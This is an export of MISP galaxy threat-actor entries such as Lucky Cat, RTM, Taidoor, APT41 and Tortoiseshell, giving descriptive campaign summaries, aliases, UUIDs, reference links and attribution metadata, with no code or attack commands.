A series of attacks, targeting both Indian military research and south Asian shipping organizations, demonstrate the minimum level of effort required to successfully compromise a target and steal sensitive information. The attackers use very simple malware, which required little development time or skills, in conjunction with freely available Web hosting, to implement a highly effective attack. It is a case of the attackers obtaining a maximum return on their investment. The attack shows how an intelligent attacker does not need to be particularly technically skilled in order to steal the information they are after. The attack begins, as is often the case, with an email sent to the victim. A malicious document is attached to the email, which, when loaded, activates the malware. The attackers use tailored emails to encourage the victim to open the email. For example, one email sent to an academic claimed to be a call for papers for a conference (CFP). The vast majority of the victims were based in India, with some in Malaysia. The victim industry was mostly military research and also shipping based in the Arabian and South China seas. In some instances the attackers appeared to have a clear goal, whereby specific files were retrieved from certain compromised computers. In other cases, the attackers used more of a ‘shotgun’ like approach, copying every file from a computer. Military technologies were obviously the focus of one particular attack with what appeared to be source code stolen. 45 different attacker IP addresses were observed. Out of those, 43 were within the same IP address range based in Sichuan province, China. The remaining two were based in South Korea. The pattern of attacker connections implies that the IP addresses are being used as a VPN, probably in an attempt to render the attackers anonymous.ænThe attacks have been active from at least April 2011 up to February 2012. The attackers are intelligent and focused, employing the minimum amount of work necessary for the maximum gain. They do not use zero day exploits or complicated threats, instead they rely on effective social engineering and lax security measures on the part of the victims.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lucky Cat.
Known Synonyms |
---|
TA413 |
White Dev 9 |
Internal MISP references
UUID e502802e-8d0a-11e9-bd72-9f046529b3fd
which can be used as unique global reference for Lucky Cat
in MISP communities and other software using the MISP galaxy
External references
- https://vx-underground.org/papers/luckycat-hackers-12-en.pdf - webarchive
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic - webarchive
Associated metadata
Metadata key | Value |
---|---|
RTM
There are several groups actively and profitably targeting businesses in Russia. A trend that we have seen unfold before our eyes lately is these cybercriminals’ use of simple backdoors to gain a foothold in their targets’ networks. Once they have this access, a lot of the work is done manually, slowly getting to understand the network layout and deploying custom tools the criminals can use to steal funds from these entities. Some of the groups that best exemplify these trends are Buhtrap, Cobalt and Corkow. The group discussed in this white paper is part of this new trend. We call this new group RTM; it uses custom malware, written in Delphi, that we cover in detail in later sections. The first trace of this tool in our telemetry data dates back to late 2015. The group also makes use of several different modules that they deploy where appropriate to their targets. They are interested in users of remote banking systems (RBS), mainly in Russia and neighboring countries.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RTM.
Known Synonyms |
---|
G0048 |
Internal MISP references
UUID 88100602-8e8b-11e9-bb7c-1bf20b58e305
which can be used as unique global reference for RTM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Shadow Network
Shadows in the Cloud documents a complex ecosystem of cyber espionage that systematically compromised government, business, academic, and other computer network systems in India, the Offices of the Dalai Lama, the United Nations, and several other countries. The report also contains an analysis of data which were stolen from politically sensitive targets and recovered during the course of the investigation. These include documents from the Offices of the Dalai Lama and agencies of the Indian national security establishment. Data containing sensitive information on citizens of numerous third-party countries, as well as personal, financial, and business information, were also exfiltrated and recovered during the course of the investigation. The report analyzes the malware ecosystem employed by the Shadows’ attackers, which leveraged multiple redundant cloud computing systems, social networking platforms, and free web hosting services in order to maintain persistent control while operating core servers located in the People’s Republic of China (PRC). Although the identity and motivation of the attackers remain unknown, the report is able to determine the location (Chengdu, PRC) as well as some of the associations of the attackers through circumstantial evidence. The investigation is the product of an eight month, collaborative activity between the Information Warfare Monitor (Citizen Lab and SecDev) and the Shadowserver Foundation. The investigation employed a fusion methodology, combining technical interrogation techniques, data analysis, and field research, to track and uncover the Shadow cyber espionage network.
Internal MISP references
UUID ef800f1c-8e90-11e9-972c-53e01614f101
which can be used as unique global reference for Shadow Network
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Slingshot
While analysing an incident which involved a suspected keylogger, we identified a malicious library able to interact with a virtual file system, which is usually the sign of an advanced APT actor. This turned out to be a malicious loader internally named ‘Slingshot’, part of a new, and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity. While for most victims the infection vector for Slingshot remains unknown, we were able to find several cases where the attackers got access to MikroTik routers and placed a component downloaded by Winbox Loader, a management suite for MikroTik routers. In turn, this infected the administrator of the router. We believe this cluster of activity started in at least 2012 and was still active at the time of this analysis (February 2018).
Internal MISP references
UUID 4fcbd08a-8ea6-11e9-8bf2-970182ab6bb5
which can be used as unique global reference for Slingshot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Taidoor
The Taidoor attackers have been actively engaging in targeted attacks since at least March 4, 2009. Despite some exceptions, the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments. One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government. The attackers spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues. The attackers actively sent out malicious documents and maintained several IP addresses for command and control. As part of their social engineering ploy, the Taidoor attackers attach a decoy document to their emails that, when opened, displays the contents of a legitimate document but executes a malicious payload in the background. We were only able to gather a limited amount of information regarding the Taidoor attackers’ activities after they have compromised a target. We did, however, find that the Taidoor malware allowed attackers to operate an interactive shell on compromised computers and to upload and download files. In order to determine the operational capabilities of the attackers behind the Taidoor campaign, we monitored a compromised honeypot. The attackers issued out some basic commands in an attempt to map out the extent of the network compromise but quickly realized that the honeypot was not an intended targeted and so promptly disabled the Taidoor malware running on it. This indicated that while Taidoor malware were more widely distributed compared with those tied to other targeted campaigns, the attackers could quickly assess their targets and distinguish these from inadvertently compromised computers and honeypots.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Taidoor.
Known Synonyms |
---|
Earth Aughisky |
G0015 |
Internal MISP references
UUID e6669606-91ad-11e9-b6f5-374843911989
which can be used as unique global reference for Taidoor
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf - webarchive
- https://attack.mitre.org/groups/G0015/ - webarchive
- https://www.trendmicro.com/en_us/research/22/j/tracking-earth-aughiskys-malware-and-changes.html - webarchive
- https://blog.reversinglabs.com/blog/taidoor-a-truly-persistent-threat - webarchive
Associated metadata
Metadata key | Value |
---|---|
TEMP.Veles
TEMP.Veles is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TEMP.Veles.
Known Synonyms |
---|
ATK91 |
G0088 |
Xenotime |
Internal MISP references
UUID 90abfc42-91c6-11e9-89b1-af58de8f7ec2
which can be used as unique global reference for TEMP.Veles
in MISP communities and other software using the MISP galaxy
External references
- https://dragos.com/resource/trisis-analyzing-safety-system-targeting-malware/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html - webarchive
- https://attack.mitre.org/groups/G0088/ - webarchive
- https://cyberthreat.thalesgroup.com/attackers/ATK91 - webarchive
- https://www.dragos.com/threat/xenotime/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
capabilities | TRISIS, custom credential harvesting |
mode-of-operation | Focused on physical destruction and long-term persistence |
since | 2014 |
victimology | Oil and Gas, Middle East |
WindShift
In August of 2018, DarkMatter released a report entitled “In the Trails of WINDSHIFT APT”, which unveiled a threat actor with TTPs very similar to those of Bahamut. Subsequently, two additional articles were released by Objective-See which provide an analysis of some validated WINDSHIFT samples targeting OSX systems. Pivoting on specific file attributes and infrastructure indicators, Unit 42 was able to identify and correlate additional attacker activity and can now provide specific details on a targeted WINDSHIFT attack as it unfolded at a Middle Eastern government agency.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WindShift.
Known Synonyms |
---|
Windy Phoenix |
Internal MISP references
UUID cbbbfc82-9294-11e9-8e19-2bc14137b25b
which can be used as unique global reference for WindShift
in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/shifting-in-the-wind-windshift-attacks-target-middle-eastern-governments/ - webarchive
- https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/windyphoenix/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
[Unnamed group]
Over the last few weeks, several significant leaks regarding a number of Iranian APTs took place. After analyzing and investigating the documents we conclude that they are authentic. Consequently, this causes considerable harm to the groups and their operation. The identity of the actor behind the leak is currently unknown, however based on the scope and the quality of the exposed documents and information, it appears that they are professional and highly capable. This leak will likely hamstring the groups' operation in the near future. Accordingly, in our assessment this will minimize the risk of potential attacks in the next few months and possibly even year. Note -most of the leaks are posted on Telegram channels that were created specifically for this purpose. Below are the three main Telegram groups on which the leaks were posted: Lab Dookhtegam pseudonym ("The people whose lips are stitched and sealed" –translation from Persian) –In this channel attack tools attributed to the group 'OilRig' were leaked; including a webshell that was inserted into the Technion, various tools that were used for DNS attacks, and more. Green Leakers–In this channel attack tools attributed to the group 'MuddyWatter' were leaked. The group's name and its symbol are identified with the "green movement", which led the protests in Iran after the Presidential elections in 2009. These protests were heavily repressed by the revolutionary guards (IRGC) Black Box–Unlike the previous two channels this has been around for a long time. On Friday May 5th, dozens of confidential documents labeled as "secret" (a high confidentiality level in Iran, one before the highest -top secret) were posted on this channel. The documents were related to Iranian attack groups' activity.
Internal MISP references
UUID f50a5f64-9296-11e9-9b46-a331d01a008d
which can be used as unique global reference for [Unnamed group]
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DUNGEON SPIDER
DUNGEON SPIDER is a criminal group operating the ransomware most commonly known as Locky, which has been active since February 2016 and was last observed in late 2017. Locky is a ransomware tool that encrypts files using a combination of cryptographic algorithms: RSA with a key size of 2,048 bits, and AES with a key size of 128 bits. Locky targets a large number of file extensions and is able to encrypt data on shared network drives. In an attempt to further impact victims and prevent file recovery, Locky deletes all of the Shadow Volume Copies on the machine. DUNGEON SPIDER primarily relies on broad spam campaigns with malicious attachments for distribution. Locky is the community/industry name associated with this actor.
Internal MISP references
UUID f1da463c-9297-11e9-875a-d327fc8282f2
which can be used as unique global reference for DUNGEON SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Fxmsp
Throughout 2017 and 2018, Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground. Some of the known Fxmsp TTPs included accessing network environments via externally available remote desktop protocol (RDP) servers and exposed active directory. Most recently, the actor claimed to have developed a credential-stealing botnet capable of infecting high-profile targets in order to exfiltrate sensitive usernames and passwords. Fxmsp has claimed that developing this botnet and improving its capabilities for stealing information from secured systems is their main goal.
Internal MISP references
UUID 686f4fe0-9298-11e9-b02a-af9595918956
which can be used as unique global reference for Fxmsp
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Gnosticplayers
The hacker said that he put up the data for sale mainly because these companies had failed to protect passwords with strong encryption algorithms like bcrypt. Most of the hashed passwords the hacker put up for sale today can cracked with various levels of difficulty --but they can be cracked. "I got upset because I feel no one is learning," the hacker told ZDNet in an online chat earlier today. "I just felt upset at this particular moment, because seeing this lack of security in 2019 is making me angry." In a conversation with ZDNet last month, the hacker told us he wanted to hack and put up for sale more than one billion records and then retire and disappear with the money. But in a conversation today, the hacker says this is not his target anymore, as he learned that other hackers have already achieved the same goal before him. Gnosticplayers also revealed that not all the data he obtained from hacked companies had been put up for sale. Some companies gave into extortion demands and paid fees so breaches would remain private. "I came to an agreement with some companies, but the concerned startups won't see their data for sale," he said. "I did it that's why I can't publish the rest of my databases or even name them."
Internal MISP references
UUID f32e3682-9298-11e9-8dcb-639156d97cd1
which can be used as unique global reference for Gnosticplayers
in MISP communities and other software using the MISP galaxy
External references
- https://www.zdnet.com/article/round-4-hacker-returns-and-puts-26mil-user-records-for-sale-on-the-dark-web/ - webarchive
- https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/ - webarchive
- https://www.zdnet.com/article/127-million-user-records-from-8-companies-put-up-for-sale-on-the-dark-web/ - webarchive
- https://www.zdnet.com/article/hacker-puts-up-for-sale-third-round-of-hacked-databases-on-the-dark-web/ - webarchive
- https://www.zdnet.com/article/a-hacker-has-dumped-nearly-one-billion-user-records-over-the-past-two-months/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Hacking Team
The many 0-days that had been collected by Hacking Team and which became publicly available during the breach of their organization in 2015, have been used by several APT groups since. Since being founded in 2003, the Italian spyware vendor Hacking Team gained notoriety for selling surveillance tools to governments and their agencies across the world. The capabilities of its flagship product, the Remote Control System (RCS), include extracting files from a targeted device, intercepting emails and instant messaging, as well as remotely activating a device’s webcam and microphone. The company has been criticized for selling these capabilities to authoritarian governments – an allegation it has consistently denied. When the tables turned in July 2015, with Hacking Team itself suffering a damaging hack, the reported use of RCS by oppressive regimes was confirmed. With 400GB of internal data – including the once-secret list of customers, internal communications, and spyware source code – leaked online, Hacking Team was forced to request its customers to suspend all use of RCS, and was left facing an uncertain future. Following the hack, the security community has been keeping a close eye on the company’s efforts to get back on its feet. The first reports suggesting Hacking Team’s resumed operations came six months later – a new sample of Hacking Team’s Mac spyware was apparently in the wild. A year after the breach, an investment by a company named Tablem Limited brought changes to Hacking Team’s shareholder structure, with Tablem Limited taking 20% of Hacking Team’s shareholding. Tablem Limited is officially based in Cyprus; however, recent news suggests it has ties to Saudi Arabia.
Internal MISP references
UUID d7f0d2a8-9329-11e9-851e-dbfc1c517e4e
which can be used as unique global reference for Hacking Team
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
OurMine
OurMine is known for celebrity internet accounts, often causing cyber vandalism, to advertise their commercial services. (Trend Micro) In light of the recent report detailing its willingness to pay US$250,000 in exchange for the 1.5 terabytes’ worth of data swiped by hackers from its servers, HBO finds itself dealing with yet another security breach. Known for hijacking prominent social media accounts, the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network. These include accounts for HBO shows, such as “Game of Thrones,” “Girls,” and “Ballers.” This is not the first time that OurMine has claimed responsibility for hacking high- profile social networking accounts. Last year, the group victimized Marvel, The New York Times, and even the heads of some of the biggest technology companies in the world. Mark Zuckerberg, Jack Dorsey, Sundar Pichai, and Daniel Ek — the CEOs of Facebook, Twitter, Google and Spotify, respectively — have also fallen victim to the hackers, dispelling the notion that a career in software and technology exempts one from being compromised.
Internal MISP references
UUID 2c9e1964-9357-11e9-ad8f-5f422851e912
which can be used as unique global reference for OurMine
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/hbo-twitter-and-facebook-accounts-hacked-by-ourmine - webarchive
- https://gizmodo.com/welp-vevo-just-got-hacked-1813390834 - webarchive
- https://www.grahamcluley.com/despite-appearances-wikileaks-wasnt-hacked/ - webarchive
- https://en.wikipedia.org/wiki/OurMine - webarchive
Associated metadata
Metadata key | Value |
---|---|
Pacha Group
Antd is a miner found in the wild on September 18, 2018. Recently we discovered that the authors from Antd are actively delivering newer campaigns deploying a broad number of components, most of them completely undetected and operating within compromised third party Linux servers. Furthermore, we have observed that some of the techniques implemented by this group are unconventional, and there is an element of sophistication to them. We believe the authors behind this malware are from Chinese origin. We have labeled the undetected Linux.Antd variants, Linux.GreedyAntd and classified the threat actor as Pacha Group.
Internal MISP references
UUID aa469d96-9357-11e9-bd7d-df125c7cba53
which can be used as unique global reference for Pacha Group
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Rocke
This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. In late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rocke.
Known Synonyms |
---|
Aged Libra |
Internal MISP references
UUID 53583c40-935e-11e9-b4fc-d7e217a306d2
which can be used as unique global reference for Rocke
in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html - webarchive
- https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/ - webarchive
- https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/agedlibra/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
[Vault 7/8]
An unnamed source leaked almost 10,000 documents describing a large number of 0-day vulnerabilities, methodologies and tools that had been collected by the CIA. This leaking was done through WikiLeaks, since March 2017. In weekly publications, the dumps were said to come from Vault 7 and later Vault 8, until his arrest in 2018. Most of the published vulnerabilities have since been fixed by the respective vendors, by many have been used by other threat actors. This actor turned out to be a former CIA software engineer. (WikiLeaks) Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency. The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virgina. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election. Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive. "Year Zero" introduces the scope and direction of the CIA's global covert hacking program, its malware arsenal and dozens of "zero day" weaponized exploits against a wide range of U.S. and European company products, include Apple's iPhone, Google's Android and Microsoft's Windows and even Samsung TVs, which are turned into covert microphones.
Internal MISP references
UUID 9f133738-935f-11e9-aa5e-bbf8d91abb46
which can be used as unique global reference for [Vault 7/8]
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ZOMBIE SPIDER
On April 7, 2017, Pytor Levashov — who predominantly used the alias Severa or Peter Severa and whom Falcon Intelligence tracks as ZOMBIE SPIDER — was arrested in an international law enforcement operation led by the FBI. ZOMBIE SPIDER’s specialty was large-scale spam distribution, a fundamental component of cybercrime operations. Levashov was the primary threat actor behind a botnet known as Kelihos and its predecessors, Waledac and Storm. In addition to Levashov’s arrest, there was a technical operation conducted by Falcon Intelligence to seize control of the Kelihos botnet.
Internal MISP references
UUID e01b8f3a-9366-11e9-9c6f-17ba128aa4b6
which can be used as unique global reference for ZOMBIE SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/ - webarchive
- https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/ - webarchive
- https://www.justice.gov/opa/pr/justice-department-announces-actions-dismantle-kelihos-botnet-0 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
ViceLeaker
In May 2018, we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens. Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims; and a hash of the APK involved (Android application) was tagged in our sample feed for inspection. Once we looked into the file, we quickly found out that the inner-workings of the APK included a malicious payload, embedded in the original code of the application. This was an original spyware program, designed to exfiltrate almost all accessible information. During the course of our research, we noticed that we were not the only ones to have found the operation. Researchers from Bitdefender also released an analysis of one of the samples in a blogpost. Although something had already been published, we decided to do something different with the data we acquired. The following month, we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples. We decided to call the operation “ViceLeaker”, because of strings and variables in its code.
Internal MISP references
UUID f676fcd1-cde9-4d0a-8958-221f2abb56e9
which can be used as unique global reference for ViceLeaker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SWEED
Cisco Talos recently identified a large number of ongoing malware distribution campaigns linked to a threat actor we're calling "SWEED," including such notable malware as Formbook, Lokibot and Agent Tesla. Based on our research, SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans. SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments. While these campaigns have featured a myriad of different types of malicious documents, the actor primarily tries to infect its victims with a packed version of Agent Tesla — an information stealer that's been around since at least 2014. The version of Agent Tesla that SWEED is using differs slightly from what we've seen in the past in the way that it is packed, as well as how it infects the system. In this post, we'll run down each campaign we're able to connect to SWEED, and talk about some of the actor's tactics, techniques and procedures (TTPs).
Internal MISP references
UUID 64ac8827-89d9-4738-9df3-cd955c628bee
which can be used as unique global reference for SWEED
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA428
Proofpoint researchers have identified a targeted APT campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. We dubbed this campaign “Operation LagTime IT” based on entities that were targeted and the distinctive domains registered to C&C IP infrastructure. Beginning in early 2019, these threat actors targeted a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. We determined that the infection vector observed in this campaign was spear phishing, with emails originating from both free email accounts and compromised user accounts. Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Additionally, this APT group utilizes Poison Ivy payloads that share overlapping command and control (C&C) infrastructure with the newly identified Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic TTPs utilized in this operation, Proofpoint analysts attribute this activity to the Chinese APT group tracked internally as TA428. Researchers believe that this activity has an operational and tactical resemblance to the Maudi Surveillance Operation which was previously reported in 2013.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA428.
Known Synonyms |
---|
BRONZE DUDLEY |
Colourful Panda |
Internal MISP references
UUID 5533d062-18ab-4c70-9472-0eac03f95a1d
which can be used as unique global reference for TA428
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology - webarchive
- https://www.recordedfuture.com/china-linked-ta428-threat-group - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop - webarchive
- https://blog.group-ib.com/task - webarchive
- https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op - webarchive
- https://www.youtube.com/watch?v=1WfPlgtfWnQ - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf - webarchive
- https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
LYCEUM
Lyceum is an Iranian APT group that has been active since at least 2014. They primarily target Middle Eastern governments and organizations in the energy and telecommunications sectors. Lyceum is known for using cyber espionage techniques and has been linked to other Iranian threat groups such as APT34. They have developed and deployed malware families like Shark and Milan, and have been observed using DNS tunneling and HTTPfor command and control communication.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LYCEUM.
Known Synonyms |
---|
COBALT LYCEUM |
Chrono Kitten |
HEXANE |
MYSTICDOME |
Spirlin |
Storm-0133 |
UNC1530 |
siamesekitten |
Internal MISP references
UUID e1b95185-8db6-4f3c-9ffd-1749087d934a
which can be used as unique global reference for LYCEUM
in MISP communities and other software using the MISP galaxy
External references
- https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-lyceum - webarchive
- https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/ - webarchive
- https://www.clearskysec.com/siamesekitten/ - webarchive
- https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Israel', 'Middle East'] |
cfr-target-category | ['Government', 'Energy', 'High-Tech', 'Telecomms', 'Education', 'Military', 'Defense'] |
cfr-type-of-incident | Espionage |
country | IR |
APT41
APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity potentially outside of state control.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT41.
Known Synonyms |
---|
Amoeba |
BARIUM |
BRONZE ATLAS |
BRONZE EXPORT |
Blackfly |
Brass Typhoon |
Earth Baku |
G0044 |
G0096 |
Grayfly |
HOODOO |
LEAD |
Red Kelpie |
TA415 |
WICKED PANDA |
WICKED SPIDER |
Internal MISP references
UUID 9c124874-042d-48cd-b72b-ccdc51ecbbd6
which can be used as unique global reference for APT41
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/winnti-faq-more-than-just-a-game/57585/ - webarchive
- https://securelist.com/winnti-more-than-just-a-game/37029/ - webarchive
- http://williamshowalter.com/a-universal-windows-bootkit/ - webarchive
- https://www.microsoft.com/security/blog/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/ - webarchive
- https://securelist.com/games-are-over/70991/ - webarchive
- https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a - webarchive
- https://www.dw.com/en/thyssenkrupp-victim-of-cyber-attack/a-36695341 - webarchive
- https://www.bleepingcomputer.com/news/security/teamviewer-confirms-undisclosed-breach-from-2016/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/ - webarchive
- https://www.dw.com/en/bayer-points-finger-at-wicked-panda-in-cyberattack/a-48196004 - webarchive
- https://www.welivesecurity.com/2019/03/11/gaming-industry-scope-attackers-asia/ - webarchive
- https://401trg.com/burning-umbrella/ - webarchive
- https://attack.mitre.org/groups/G0044/ - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-july-wicked-spider/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-atlas - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-export - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer - webarchive
- https://assets.documentcloud.org/documents/7210602/FLASH-AC-000133-TT-Published.pdf - webarchive
- https://www.cfr.org/cyber-operations/winnti-umbrella - webarchive
- https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html - webarchive
- https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/ - webarchive
- https://www.mandiant.com/resources/report-apt41-double-dragon-a-dual-espionage-and-cyber-crime-operation - webarchive
- https://www.cfr.org/cyber-operations/apt-41 - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf - webarchive
- https://www.trendmicro.com/en_us/research/24/d/earth-freybug.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | People's Republic of China |
cfr-suspected-victims | ['China', 'France', 'Hong Kong', 'India', 'Italy', 'Japan', 'Myanmar', 'Netherlands', 'Singapore', 'South Korea', 'South Africa', 'Switzerland', 'Thailand', 'Turkey', 'United Kingdom', 'United States'] |
cfr-target-category | ['Automotive', 'Business', 'Services', 'Cryptocurrency', 'Education', 'Energy', 'Financial', 'Healthcare', 'High-Tech', 'Intergovernmental', 'Media and Entertainment', 'Pharmaceuticals', 'Private sector', 'Retail', 'Telecommunications', 'Travel'] |
country | CN |
Related clusters
To see the related clusters, click here.
Tortoiseshell
A previously undocumented attack group is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers’ customers. The group, which we are calling Tortoiseshell, has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tortoiseshell.
Known Synonyms |
---|
Crimson Sandstorm |
DUSTYCAVE |
IMPERIAL KITTEN |
Imperial Kitten |
TA456 |
Yellow Liderc |
Internal MISP references
UUID 5f108484-db7f-11e9-aaa4-fb0176425734
which can be used as unique global reference for Tortoiseshell
in MISP communities and other software using the MISP galaxy
External references
